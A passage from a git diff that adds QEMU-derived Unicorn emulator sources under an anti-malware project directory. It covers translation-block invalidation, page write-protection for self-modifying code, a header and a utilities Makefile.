all TBs which intersect with the target physical address range + * [start;end[. NOTE: start and end may refer to *different* physical pages. + * 'is_cpu_write_access' should be true if called from a real cpu write + * access: the virtual CPU will exit the current TB if code is modified inside + * this TB. + */ +void tb_invalidate_phys_range(struct uc_struct *uc, tb_page_addr_t start, tb_page_addr_t end, + int is_cpu_write_access) +{ + while (start < end) { + tb_invalidate_phys_page_range(uc, start, end, is_cpu_write_access); + start &= TARGET_PAGE_MASK; + start += TARGET_PAGE_SIZE; + } +} + +/* + * Invalidate all TBs which intersect with the target physical address range + * [start;end[. 
NOTE: start and end must refer to the *same* physical page. + * 'is_cpu_write_access' should be true if called from a real cpu write + * access: the virtual CPU will exit the current TB if code is modified inside + * this TB. + */ +void tb_invalidate_phys_page_range(struct uc_struct *uc, tb_page_addr_t start, tb_page_addr_t end, + int is_cpu_write_access) +{ + TranslationBlock *tb, *tb_next, *saved_tb; + CPUState *cpu = uc->current_cpu; +#if defined(TARGET_HAS_PRECISE_SMC) + CPUArchState *env = NULL; +#endif + tb_page_addr_t tb_start, tb_end; + PageDesc *p; + int n; +#ifdef TARGET_HAS_PRECISE_SMC + int current_tb_not_found = is_cpu_write_access; + TranslationBlock *current_tb = NULL; + int current_tb_modified = 0; + target_ulong current_pc = 0; + target_ulong current_cs_base = 0; + int current_flags = 0; +#endif /* TARGET_HAS_PRECISE_SMC */ + + p = page_find(uc, start >> TARGET_PAGE_BITS); + if (!p) { + return; + } + if (!p->code_bitmap && + ++p->code_write_count >= SMC_BITMAP_USE_THRESHOLD && + is_cpu_write_access) { + /* build code bitmap */ + build_page_bitmap(p); + } +#if defined(TARGET_HAS_PRECISE_SMC) + if (cpu != NULL) { + env = cpu->env_ptr; + } +#endif + + /* we remove all the TBs in the range [start, end[ */ + /* XXX: see if in some cases it could be faster to invalidate all + the code */ + tb = p->first_tb; + while (tb != NULL) { + n = (uintptr_t)tb & 3; + tb = (TranslationBlock *)((uintptr_t)tb & ~3); + tb_next = tb->page_next[n]; + /* NOTE: this is subtle as a TB may span two physical pages */ + if (n == 0) { + /* NOTE: tb_end may be after the end of the page, but + it is not a problem */ + tb_start = tb->page_addr[0] + (tb->pc & ~TARGET_PAGE_MASK); + tb_end = tb_start + tb->size; + } else { + tb_start = tb->page_addr[1]; + tb_end = tb_start + ((tb->pc + tb->size) & ~TARGET_PAGE_MASK); + } + if (!(tb_end <= start || tb_start >= end)) { +#ifdef TARGET_HAS_PRECISE_SMC + if (current_tb_not_found) { + current_tb_not_found = 0; + current_tb = NULL; + if 
(cpu->mem_io_pc) { + /* now we have a real cpu fault */ + current_tb = tb_find_pc(uc, cpu->mem_io_pc); + } + } + if (current_tb == tb && + (current_tb->cflags & CF_COUNT_MASK) != 1) { + /* If we are modifying the current TB, we must stop + its execution. We could be more precise by checking + that the modification is after the current PC, but it + would require a specialized function to partially + restore the CPU state */ + + current_tb_modified = 1; + // self-modifying code will restore state from TB + cpu_restore_state_from_tb(cpu, current_tb, cpu->mem_io_pc); + cpu_get_tb_cpu_state(env, ¤t_pc, ¤t_cs_base, + ¤t_flags); + } +#endif /* TARGET_HAS_PRECISE_SMC */ + /* we need to do that to handle the case where a signal + occurs while doing tb_phys_invalidate() */ + saved_tb = NULL; + if (cpu != NULL) { + saved_tb = cpu->current_tb; + cpu->current_tb = NULL; + } + tb_phys_invalidate(uc, tb, -1); + if (cpu != NULL) { + cpu->current_tb = saved_tb; + if (cpu->interrupt_request && cpu->current_tb) { + cpu_interrupt(cpu, cpu->interrupt_request); + } + } + } + tb = tb_next; + } +#if !defined(CONFIG_USER_ONLY) + /* if no code remaining, no need to continue to use slow writes */ + if (!p->first_tb) { + invalidate_page_bitmap(p); + if (is_cpu_write_access) { + tlb_unprotect_code_phys(cpu, start, cpu->mem_io_vaddr); + } + } +#endif +#ifdef TARGET_HAS_PRECISE_SMC + if (current_tb_modified) { + /* we generate a block containing just the instruction + modifying the memory. 
It will ensure that it cannot modify + itself */ + cpu->current_tb = NULL; + tb_gen_code(cpu, current_pc, current_cs_base, current_flags, 1); + cpu_resume_from_signal(cpu, NULL); + } +#endif +} + +#if !defined(CONFIG_SOFTMMU) +static void tb_invalidate_phys_page(struct uc_struct *uc, tb_page_addr_t addr, + uintptr_t pc, void *puc, + bool locked) +{ + TranslationBlock *tb; + PageDesc *p; + int n; +#ifdef TARGET_HAS_PRECISE_SMC + TranslationBlock *current_tb = NULL; + CPUState *cpu = uc->current_cpu; + CPUArchState *env = NULL; + int current_tb_modified = 0; + target_ulong current_pc = 0; + target_ulong current_cs_base = 0; + int current_flags = 0; +#endif + + addr &= TARGET_PAGE_MASK; + p = page_find(addr >> TARGET_PAGE_BITS); + if (!p) { + return; + } + tb = p->first_tb; +#ifdef TARGET_HAS_PRECISE_SMC + if (tb && pc != 0) { + current_tb = tb_find_pc(uc, pc); + } + if (cpu != NULL) { + env = cpu->env_ptr; + } +#endif + while (tb != NULL) { + n = (uintptr_t)tb & 3; + tb = (TranslationBlock *)((uintptr_t)tb & ~3); +#ifdef TARGET_HAS_PRECISE_SMC + if (current_tb == tb && + (current_tb->cflags & CF_COUNT_MASK) != 1) { + /* If we are modifying the current TB, we must stop + its execution. We could be more precise by checking + that the modification is after the current PC, but it + would require a specialized function to partially + restore the CPU state */ + + current_tb_modified = 1; + cpu_restore_state_from_tb(cpu, current_tb, pc); + cpu_get_tb_cpu_state(env, ¤t_pc, ¤t_cs_base, + ¤t_flags); + } +#endif /* TARGET_HAS_PRECISE_SMC */ + tb_phys_invalidate(uc, tb, addr); + tb = tb->page_next[n]; + } + p->first_tb = NULL; +#ifdef TARGET_HAS_PRECISE_SMC + if (current_tb_modified) { + /* we generate a block containing just the instruction + modifying the memory. 
It will ensure that it cannot modify + itself */ + cpu->current_tb = NULL; + tb_gen_code(cpu, current_pc, current_cs_base, current_flags, 1); + if (locked) { + mmap_unlock(); + } + cpu_resume_from_signal(cpu, puc); + } +#endif +} +#endif + +/* add the tb in the target page and protect it if necessary */ +static inline void tb_alloc_page(struct uc_struct *uc, TranslationBlock *tb, + unsigned int n, tb_page_addr_t page_addr) +{ + PageDesc *p; +#ifndef CONFIG_USER_ONLY + bool page_already_protected; +#endif + + tb->page_addr[n] = page_addr; + p = page_find_alloc(uc, page_addr >> TARGET_PAGE_BITS, 1); + tb->page_next[n] = p->first_tb; +#ifndef CONFIG_USER_ONLY + page_already_protected = p->first_tb != NULL; +#endif + p->first_tb = (TranslationBlock *)((uintptr_t)tb | n); + invalidate_page_bitmap(p); + +#if defined(TARGET_HAS_SMC) || 1 + +#if defined(CONFIG_USER_ONLY) + if (p->flags & PAGE_WRITE) { + target_ulong addr; + PageDesc *p2; + int prot; + + /* force the host page as non writable (writes will have a + page fault + mprotect overhead) */ + page_addr &= qemu_host_page_mask; + prot = 0; + for (addr = page_addr; addr < page_addr + qemu_host_page_size; + addr += TARGET_PAGE_SIZE) { + + p2 = page_find(addr >> TARGET_PAGE_BITS); + if (!p2) { + continue; + } + prot |= p2->flags; + p2->flags &= ~PAGE_WRITE; + } + mprotect(g2h(page_addr), qemu_host_page_size, + (prot & PAGE_BITS) & ~PAGE_WRITE); +#ifdef DEBUG_TB_INVALIDATE + printf("protecting code page: 0x" TARGET_FMT_lx "\n", + page_addr); +#endif + } +#else + /* if some code is already present, then the pages are already + protected. 
So we handle the case where only the first TB is + allocated in a physical page */ + if (!page_already_protected) { + tlb_protect_code(uc, page_addr); + } +#endif + +#endif /* TARGET_HAS_SMC */ +} + +void tb_invalidate_phys_page_fast(struct uc_struct* uc, tb_page_addr_t start, int len) +{ + PageDesc *p; + +#if 0 + if (1) { + qemu_log("modifying code at 0x%x size=%d EIP=%x PC=%08x\n", + cpu_single_env->mem_io_vaddr, len, + cpu_single_env->eip, + cpu_single_env->eip + + (intptr_t)cpu_single_env->segs[R_CS].base); + } +#endif + p = page_find(uc, start >> TARGET_PAGE_BITS); + if (!p) { + return; + } + if (p->code_bitmap) { + unsigned int nr; + unsigned long b; + + nr = start & ~TARGET_PAGE_MASK; + b = p->code_bitmap[BIT_WORD(nr)] >> ((nr & (BITS_PER_LONG - 1)) & 0x1f); + if (b & ((1 << len) - 1)) { + goto do_invalidate; + } + } else { + do_invalidate: + tb_invalidate_phys_page_range(uc, start, start + len, 1); + } +} + +/* add a new TB and link it to the physical page tables. phys_page2 is + (-1) to indicate that only one page contains the TB. */ +static void tb_link_page(struct uc_struct *uc, + TranslationBlock *tb, tb_page_addr_t phys_pc, tb_page_addr_t phys_page2) +{ + TCGContext *tcg_ctx = uc->tcg_ctx; + unsigned int h; + TranslationBlock **ptb; + + /* Grab the mmap lock to stop another thread invalidating this TB + before we are done. 
*/ + mmap_lock(); + /* add in the physical hash table */ + h = tb_phys_hash_func(phys_pc); + ptb = &tcg_ctx->tb_ctx.tb_phys_hash[h]; + tb->phys_hash_next = *ptb; + *ptb = tb; + + /* add in the page list */ + tb_alloc_page(uc, tb, 0, phys_pc & TARGET_PAGE_MASK); + if (phys_page2 != -1) { + tb_alloc_page(uc, tb, 1, phys_page2); + } else { + tb->page_addr[1] = -1; + } + + tb->jmp_first = (TranslationBlock *)((uintptr_t)tb | 2); + tb->jmp_next[0] = NULL; + tb->jmp_next[1] = NULL; + + /* init original jump addresses */ + if (tb->tb_next_offset[0] != 0xffff) { + tb_reset_jump(tb, 0); + } + if (tb->tb_next_offset[1] != 0xffff) { + tb_reset_jump(tb, 1); + } + +#ifdef DEBUG_TB_CHECK + tb_page_check(); +#endif + mmap_unlock(); +} + +/* find the TB 'tb' such that tb[0].tc_ptr <= tc_ptr < + tb[1].tc_ptr. Return NULL if not found */ +static TranslationBlock *tb_find_pc(struct uc_struct *uc, uintptr_t tc_ptr) +{ + TCGContext *tcg_ctx = uc->tcg_ctx; + int m_min, m_max, m; + uintptr_t v; + TranslationBlock *tb; + + if (tcg_ctx->tb_ctx.nb_tbs <= 0) { + return NULL; + } + if (tc_ptr < (uintptr_t)tcg_ctx->code_gen_buffer || + tc_ptr >= (uintptr_t)tcg_ctx->code_gen_ptr) { + return NULL; + } + /* binary search (cf Knuth) */ + m_min = 0; + m_max = tcg_ctx->tb_ctx.nb_tbs - 1; + while (m_min <= m_max) { + m = (m_min + m_max) >> 1; + tb = &tcg_ctx->tb_ctx.tbs[m]; + v = (uintptr_t)tb->tc_ptr; + if (v == tc_ptr) { + return tb; + } else if (tc_ptr < v) { + m_max = m - 1; + } else { + m_min = m + 1; + } + } + return &tcg_ctx->tb_ctx.tbs[m_max]; +} + +#if defined(TARGET_HAS_ICE) && !defined(CONFIG_USER_ONLY) +void tb_invalidate_phys_addr(AddressSpace *as, hwaddr addr) +{ + ram_addr_t ram_addr; + MemoryRegion *mr; + hwaddr l = 1; + + mr = address_space_translate(as, addr, &addr, &l, false); + if (!(memory_region_is_ram(mr) + || memory_region_is_romd(mr))) { + return; + } + ram_addr = (ram_addr_t)((memory_region_get_ram_addr(mr) & TARGET_PAGE_MASK) + + addr); + 
tb_invalidate_phys_page_range(as->uc, ram_addr, ram_addr + 1, 0); +} +#endif /* TARGET_HAS_ICE && !defined(CONFIG_USER_ONLY) */ + +void tb_check_watchpoint(CPUState *cpu) +{ + TranslationBlock *tb; + CPUArchState *env = cpu->env_ptr; + + tb = tb_find_pc(env->uc, cpu->mem_io_pc); + if (!tb) { + cpu_abort(cpu, "check_watchpoint: could not find TB for pc=%p", + (void *)cpu->mem_io_pc); + } + cpu_restore_state_from_tb(cpu, tb, cpu->mem_io_pc); + tb_phys_invalidate(cpu->uc, tb, -1); +} + +#ifndef CONFIG_USER_ONLY +/* mask must never be zero, except for A20 change call */ +static void tcg_handle_interrupt(CPUState *cpu, int mask) +{ + cpu->interrupt_request |= mask; + + cpu->tcg_exit_req = 1; +} + +CPUInterruptHandler cpu_interrupt_handler = tcg_handle_interrupt; + +/* in deterministic execution mode, instructions doing device I/Os + must be at the end of the TB */ +void cpu_io_recompile(CPUState *cpu, uintptr_t retaddr) +{ + CPUArchState *env = cpu->env_ptr; + TranslationBlock *tb; + uint32_t n, cflags; + target_ulong pc, cs_base; + uint64_t flags; + + tb = tb_find_pc(env->uc, retaddr); + if (!tb) { + cpu_abort(cpu, "cpu_io_recompile: could not find TB for pc=%p", + (void *)retaddr); + } + n = cpu->icount_decr.u16.low + tb->icount; + cpu_restore_state_from_tb(cpu, tb, retaddr); + /* Calculate how many instructions had been executed before the fault + occurred. */ + n = n - cpu->icount_decr.u16.low; + /* Generate a new TB ending on the I/O insn. */ + n++; + /* On MIPS and SH, delay slot instructions can only be restarted if + they were already the first instruction in the TB. If this is not + the first instruction in a TB then re-execute the preceding + branch. 
*/ +#if defined(TARGET_MIPS) + if ((env->hflags & MIPS_HFLAG_BMASK) != 0 && n > 1) { + env->active_tc.PC -= 4; + cpu->icount_decr.u16.low++; + env->hflags &= ~MIPS_HFLAG_BMASK; + } +#elif defined(TARGET_SH4) + if ((env->flags & ((DELAY_SLOT | DELAY_SLOT_CONDITIONAL))) != 0 + && n > 1) { + env->pc -= 2; + cpu->icount_decr.u16.low++; + env->flags &= ~(DELAY_SLOT | DELAY_SLOT_CONDITIONAL); + } +#endif + /* This should never happen. */ + if (n > CF_COUNT_MASK) { + cpu_abort(cpu, "TB too big during recompile"); + } + + cflags = n | CF_LAST_IO; + pc = tb->pc; + cs_base = tb->cs_base; + flags = tb->flags; + tb_phys_invalidate(cpu->uc, tb, -1); + /* FIXME: In theory this could raise an exception. In practice + we have already translated the block once so it's probably ok. */ + tb_gen_code(cpu, pc, cs_base, (int)flags, cflags); + /* TODO: If env->pc != tb->pc (i.e. the faulting instruction was not + the first in the TB) then we end up generating a whole new TB and + repeating the fault, which is horribly inefficient. + Better would be to execute just this insn uncached, or generate a + second new TB. */ + cpu_resume_from_signal(cpu, NULL); +} + +void tb_flush_jmp_cache(CPUState *cpu, target_ulong addr) +{ + unsigned int i; + + /* Discard jump cache entries for any tb which might potentially + overlap the flushed page. 
*/ + i = tb_jmp_cache_hash_page(addr - TARGET_PAGE_SIZE); + memset(&cpu->tb_jmp_cache[i], 0, + TB_JMP_PAGE_SIZE * sizeof(TranslationBlock *)); + + i = tb_jmp_cache_hash_page(addr); + memset(&cpu->tb_jmp_cache[i], 0, + TB_JMP_PAGE_SIZE * sizeof(TranslationBlock *)); +} + +#if 0 +void dump_exec_info(FILE *f, fprintf_function cpu_fprintf) +{ + int i, target_code_size, max_target_code_size; + int direct_jmp_count, direct_jmp2_count, cross_page; + TranslationBlock *tb; + + target_code_size = 0; + max_target_code_size = 0; + cross_page = 0; + direct_jmp_count = 0; + direct_jmp2_count = 0; + for (i = 0; i < tcg_ctx.tb_ctx.nb_tbs; i++) { + tb = &tcg_ctx.tb_ctx.tbs[i]; + target_code_size += tb->size; + if (tb->size > max_target_code_size) { + max_target_code_size = tb->size; + } + if (tb->page_addr[1] != -1) { + cross_page++; + } + if (tb->tb_next_offset[0] != 0xffff) { + direct_jmp_count++; + if (tb->tb_next_offset[1] != 0xffff) { + direct_jmp2_count++; + } + } + } + /* XXX: avoid using doubles ? */ + cpu_fprintf(f, "Translation buffer state:\n"); + cpu_fprintf(f, "gen code size %td/%zd\n", + tcg_ctx.code_gen_ptr - tcg_ctx.code_gen_buffer, + tcg_ctx.code_gen_buffer_max_size); + cpu_fprintf(f, "TB count %d/%d\n", + tcg_ctx.tb_ctx.nb_tbs, tcg_ctx.code_gen_max_blocks); + cpu_fprintf(f, "TB avg target size %d max=%d bytes\n", + tcg_ctx.tb_ctx.nb_tbs ? target_code_size / + tcg_ctx.tb_ctx.nb_tbs : 0, + max_target_code_size); + cpu_fprintf(f, "TB avg host size %td bytes (expansion ratio: %0.1f)\n", + tcg_ctx.tb_ctx.nb_tbs ? (tcg_ctx.code_gen_ptr - + tcg_ctx.code_gen_buffer) / + tcg_ctx.tb_ctx.nb_tbs : 0, + target_code_size ? (double) (tcg_ctx.code_gen_ptr - + tcg_ctx.code_gen_buffer) / + target_code_size : 0); + cpu_fprintf(f, "cross page TB count %d (%d%%)\n", cross_page, + tcg_ctx.tb_ctx.nb_tbs ? (cross_page * 100) / + tcg_ctx.tb_ctx.nb_tbs : 0); + cpu_fprintf(f, "direct jump count %d (%d%%) (2 jumps=%d %d%%)\n", + direct_jmp_count, + tcg_ctx.tb_ctx.nb_tbs ? 
(direct_jmp_count * 100) / + tcg_ctx.tb_ctx.nb_tbs : 0, + direct_jmp2_count, + tcg_ctx.tb_ctx.nb_tbs ? (direct_jmp2_count * 100) / + tcg_ctx.tb_ctx.nb_tbs : 0); + cpu_fprintf(f, "\nStatistics:\n"); + cpu_fprintf(f, "TB flush count %d\n", tcg_ctx.tb_ctx.tb_flush_count); + cpu_fprintf(f, "TB invalidate count %d\n", + tcg_ctx.tb_ctx.tb_phys_invalidate_count); + //cpu_fprintf(f, "TLB flush count %d\n", tlb_flush_count); + tcg_dump_info(f, cpu_fprintf); +} +#endif + +#else /* CONFIG_USER_ONLY */ + +void cpu_interrupt(CPUState *cpu, int mask) +{ + cpu->interrupt_request |= mask; + cpu->tcg_exit_req = 1; +} + +#if 0 +/* + * Walks guest process memory "regions" one by one + * and calls callback function 'fn' for each region. + */ +struct walk_memory_regions_data { + walk_memory_regions_fn fn; + void *priv; + target_ulong start; + int prot; +}; + +static int walk_memory_regions_end(struct walk_memory_regions_data *data, + target_ulong end, int new_prot) +{ + if (data->start != -1u) { + int rc = data->fn(data->priv, data->start, end, data->prot); + if (rc != 0) { + return rc; + } + } + + data->start = (new_prot ? 
end : -1u); + data->prot = new_prot; + + return 0; +} + +static int walk_memory_regions_1(struct walk_memory_regions_data *data, + target_ulong base, int level, void **lp) +{ + target_ulong pa; + int i, rc; + + if (*lp == NULL) { + return walk_memory_regions_end(data, base, 0); + } + + if (level == 0) { + PageDesc *pd = *lp; + + for (i = 0; i < V_L2_SIZE; ++i) { + int prot = pd[i].flags; + + pa = base | (i << TARGET_PAGE_BITS); + if (prot != data->prot) { + rc = walk_memory_regions_end(data, pa, prot); + if (rc != 0) { + return rc; + } + } + } + } else { + void **pp = *lp; + + for (i = 0; i < V_L2_SIZE; ++i) { + pa = base | ((target_ulong)i << + (TARGET_PAGE_BITS + V_L2_BITS * level)); + rc = walk_memory_regions_1(data, pa, level - 1, pp + i); + if (rc != 0) { + return rc; + } + } + } + + return 0; +} + +typedef int (*walk_memory_regions_fn)(void *, target_ulong, + target_ulong, unsigned long); + +static int walk_memory_regions(void *priv, walk_memory_regions_fn fn) +{ + struct walk_memory_regions_data data; + uintptr_t i; + + data.fn = fn; + data.priv = priv; + data.start = -1u; + data.prot = 0; + + for (i = 0; i < V_L1_SIZE; i++) { + int rc = walk_memory_regions_1(&data, (target_ulong)i << (V_L1_SHIFT + TARGET_PAGE_BITS), + V_L1_SHIFT / V_L2_BITS - 1, l1_map + i); + if (rc != 0) { + return rc; + } + } + + return walk_memory_regions_end(&data, 0, 0); +} + +static int dump_region(void *priv, target_ulong start, + target_ulong end, unsigned long prot) +{ + FILE *f = (FILE *)priv; + + (void) fprintf(f, TARGET_FMT_lx"-"TARGET_FMT_lx + " "TARGET_FMT_lx" %c%c%c\n", + start, end, end - start, + ((prot & PAGE_READ) ? 'r' : '-'), + ((prot & PAGE_WRITE) ? 'w' : '-'), + ((prot & PAGE_EXEC) ? 
'x' : '-')); + + return 0; +} + +/* dump memory mappings */ +void page_dump(FILE *f) +{ + const int length = sizeof(target_ulong) * 2; + (void) fprintf(f, "%-*s %-*s %-*s %s\n", + length, "start", length, "end", length, "size", "prot"); + walk_memory_regions(f, dump_region); +} + +#endif + +int page_get_flags(target_ulong address) +{ + PageDesc *p; + + p = page_find(address >> TARGET_PAGE_BITS); + if (!p) { + return 0; + } + return p->flags; +} + +/* Modify the flags of a page and invalidate the code if necessary. + The flag PAGE_WRITE_ORG is positioned automatically depending + on PAGE_WRITE. The mmap_lock should already be held. */ +static void page_set_flags(struct uc_struct *uc, target_ulong start, target_ulong end, int flags) +{ + target_ulong addr, len; + + /* This function should never be called with addresses outside the + guest address space. If this assert fires, it probably indicates + a missing call to h2g_valid. */ +#if TARGET_ABI_BITS > L1_MAP_ADDR_SPACE_BITS + assert(end < ((target_ulong)1 << L1_MAP_ADDR_SPACE_BITS)); +#endif + assert(start < end); + + start = start & TARGET_PAGE_MASK; + end = TARGET_PAGE_ALIGN(end); + + if (flags & PAGE_WRITE) { + flags |= PAGE_WRITE_ORG; + } + + for (addr = start, len = end - start; + len != 0; + len -= TARGET_PAGE_SIZE, addr += TARGET_PAGE_SIZE) { + PageDesc *p = page_find_alloc(uc, addr >> TARGET_PAGE_BITS, 1); + + /* If the write protection bit is set, then we invalidate + the code inside. */ + if (!(p->flags & PAGE_WRITE) && + (flags & PAGE_WRITE) && + p->first_tb) { + tb_invalidate_phys_page(addr, 0, NULL, false); + } + p->flags = flags; + } +} + +static int page_check_range(target_ulong start, target_ulong len, int flags) +{ + PageDesc *p; + target_ulong end; + target_ulong addr; + + /* This function should never be called with addresses outside the + guest address space. If this assert fires, it probably indicates + a missing call to h2g_valid. 
*/
+#if TARGET_ABI_BITS > L1_MAP_ADDR_SPACE_BITS
+    assert(start < ((target_ulong)1 << L1_MAP_ADDR_SPACE_BITS));
+#endif
+
+    if (len == 0) {
+        return 0;
+    }
+    if (start + len - 1 < start) {
+        /* We've wrapped around. */
+        return -1;
+    }
+
+    /* must do before we lose bits in the next step */
+    end = TARGET_PAGE_ALIGN(start + len);
+    start = start & TARGET_PAGE_MASK;
+
+    for (addr = start, len = end - start;
+         len != 0;
+         len -= TARGET_PAGE_SIZE, addr += TARGET_PAGE_SIZE) {
+        p = page_find(addr >> TARGET_PAGE_BITS);
+        if (!p) {
+            return -1;
+        }
+        if (!(p->flags & PAGE_VALID)) {
+            return -1;
+        }
+
+        if ((flags & PAGE_READ) && !(p->flags & PAGE_READ)) {
+            return -1;
+        }
+        if (flags & PAGE_WRITE) {
+            if (!(p->flags & PAGE_WRITE_ORG)) {
+                return -1;
+            }
+            /* unprotect the page if it was put read-only because it
+               contains translated code */
+            if (!(p->flags & PAGE_WRITE)) {
+                if (!page_unprotect(addr, 0, NULL)) {
+                    return -1;
+                }
+            }
+        }
+    }
+    return 0;
+}
+
+/* called from signal handler: invalidate the code and unprotect the
+   page. Return TRUE if the fault was successfully handled. */
+static int page_unprotect(target_ulong address, uintptr_t pc, void *puc)
+{
+    unsigned int prot;
+    PageDesc *p;
+    target_ulong host_start, host_end, addr;
+
+    /* Technically this isn't safe inside a signal handler. However we
+       know this only ever happens in a synchronous SEGV handler, so in
+       practice it seems to be ok. 
*/
+    mmap_lock();
+
+    p = page_find(address >> TARGET_PAGE_BITS);
+    if (!p) {
+        mmap_unlock();
+        return 0;
+    }
+
+    /* if the page was really writable, then we change its
+       protection back to writable */
+    if ((p->flags & PAGE_WRITE_ORG) && !(p->flags & PAGE_WRITE)) {
+        host_start = address & qemu_host_page_mask;
+        host_end = host_start + qemu_host_page_size;
+
+        prot = 0;
+        for (addr = host_start ; addr < host_end ; addr += TARGET_PAGE_SIZE) {
+            p = page_find(addr >> TARGET_PAGE_BITS);
+            p->flags |= PAGE_WRITE;
+            prot |= p->flags;
+
+            /* and since the content will be modified, we must invalidate
+               the corresponding translated code. */
+            tb_invalidate_phys_page(addr, pc, puc, true);
+#ifdef DEBUG_TB_CHECK
+            tb_invalidate_check(addr);
+#endif
+        }
+        mprotect((void *)g2h(host_start), qemu_host_page_size,
+                 prot & PAGE_BITS);
+
+        mmap_unlock();
+        return 1;
+    }
+    mmap_unlock();
+    return 0;
+}
+#endif /* CONFIG_USER_ONLY */
diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/translate-all.h b/ai_anti_malware/unicorn/unicorn-master/qemu/translate-all.h
new file mode 100644
index 0000000..8216ad8
--- /dev/null
+++ b/ai_anti_malware/unicorn/unicorn-master/qemu/translate-all.h
@@ -0,0 +1,28 @@
+/*
+ * Translated block handling
+ *
+ * Copyright (c) 2003 Fabrice Bellard
+ *
+ * This library is free software; you can redistribute it and/or
+ * modify it under the terms of the GNU Lesser General Public
+ * License as published by the Free Software Foundation; either
+ * version 2 of the License, or (at your option) any later version.
+ *
+ * This library is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * Lesser General Public License for more details.
+ *
+ * You should have received a copy of the GNU Lesser General Public
+ * License along with this library; if not, see <http://www.gnu.org/licenses/>. 
+ */
+#ifndef TRANSLATE_ALL_H
+#define TRANSLATE_ALL_H
+
+/* translate-all.c */
+void cpu_unlink_tb(CPUState *cpu);
+void tb_check_watchpoint(CPUState *cpu);
+void tb_invalidate_phys_page_fast(struct uc_struct* uc, tb_page_addr_t start, int len);
+void tb_cleanup(struct uc_struct *uc);
+
+#endif /* TRANSLATE_ALL_H */
diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/unicorn_common.h b/ai_anti_malware/unicorn/unicorn-master/qemu/unicorn_common.h
new file mode 100644
index 0000000..2117c62
--- /dev/null
+++ b/ai_anti_malware/unicorn/unicorn-master/qemu/unicorn_common.h
@@ -0,0 +1,91 @@
+#ifndef UNICORN_COMMON_H_
+#define UNICORN_COMMON_H_
+
+#include "tcg.h"
+
+// This header defines common patterns/code that will be included in all arch-specific
+// code for unicorn's purposes.
+
+// return true on success, false on failure
+static inline bool cpu_physical_mem_read(AddressSpace *as, hwaddr addr,
+                                         uint8_t *buf, int len)
+{
+    return !cpu_physical_memory_rw(as, addr, (void *)buf, len, 0);
+}
+
+static inline bool cpu_physical_mem_write(AddressSpace *as, hwaddr addr,
+                                          const uint8_t *buf, int len)
+{
+    return !cpu_physical_memory_rw(as, addr, (void *)buf, len, 1);
+}
+
+void tb_cleanup(struct uc_struct *uc);
+void free_code_gen_buffer(struct uc_struct *uc);
+
+/** Freeing common resources */
+static void release_common(void *t)
+{
+    TCGPool *po, *to;
+    TCGContext *s = (TCGContext *)t;
+#if TCG_TARGET_REG_BITS == 32
+    int i;
+#endif
+
+    // Clean TCG.
+    TCGOpDef* def = &s->tcg_op_defs[0];
+    g_free(def->args_ct);
+    g_free(def->sorted_args);
+    g_free(s->tcg_op_defs);
+
+    for (po = s->pool_first; po; po = to) {
+        to = po->next;
+        g_free(po);
+    }
+    tcg_pool_reset(s);
+    g_hash_table_destroy(s->helpers);
+
+    // TODO(danghvu): these functions are not available outside qemu,
+    // so we keep them here instead of outside uc_close. 
+ phys_mem_clean(s->uc); + address_space_destroy(&(s->uc->as)); + memory_free(s->uc); + tb_cleanup(s->uc); + free_code_gen_buffer(s->uc); + cpu_watchpoint_remove_all(CPU(s->uc->cpu), BP_CPU); + cpu_breakpoint_remove_all(CPU(s->uc->cpu), BP_CPU); + +#if TCG_TARGET_REG_BITS == 32 + for(i = 0; i < s->nb_globals; i++) { + TCGTemp *ts = &s->temps[i]; + if (ts->base_type == TCG_TYPE_I64) { + if (ts->name && ((strcmp(ts->name+(strlen(ts->name)-2), "_0") == 0) || + (strcmp(ts->name+(strlen(ts->name)-2), "_1") == 0))) { + free((void *)ts->name); + } + } + } +#endif +} + +static inline void uc_common_init(struct uc_struct* uc) +{ + memory_register_types(uc); + uc->write_mem = cpu_physical_mem_write; + uc->read_mem = cpu_physical_mem_read; + uc->tcg_enabled = tcg_enabled; + uc->tcg_exec_init = tcg_exec_init; + uc->cpu_exec_init_all = cpu_exec_init_all; + uc->vm_start = vm_start; + uc->memory_map = memory_map; + uc->memory_map_ptr = memory_map_ptr; + uc->memory_unmap = memory_unmap; + uc->readonly_mem = memory_region_set_readonly; + + uc->target_page_size = TARGET_PAGE_SIZE; + uc->target_page_align = TARGET_PAGE_SIZE - 1; + + if (!uc->release) + uc->release = release_common; +} + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/util/Makefile.objs b/ai_anti_malware/unicorn/unicorn-master/qemu/util/Makefile.objs new file mode 100644 index 0000000..874cee1 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/util/Makefile.objs @@ -0,0 +1,10 @@ +util-obj-y = cutils.o qemu-timer-common.o +util-obj-$(CONFIG_WIN32) += oslib-win32.o qemu-thread-win32.o +util-obj-$(CONFIG_POSIX) += oslib-posix.o qemu-thread-posix.o +util-obj-y += module.o +util-obj-y += bitmap.o bitops.o +util-obj-y += error.o +util-obj-y += aes.o +util-obj-y += crc32c.o +util-obj-y += host-utils.o +util-obj-y += getauxval.o diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/util/aes.c b/ai_anti_malware/unicorn/unicorn-master/qemu/util/aes.c new file mode 100644 index 0000000..50c69c3 
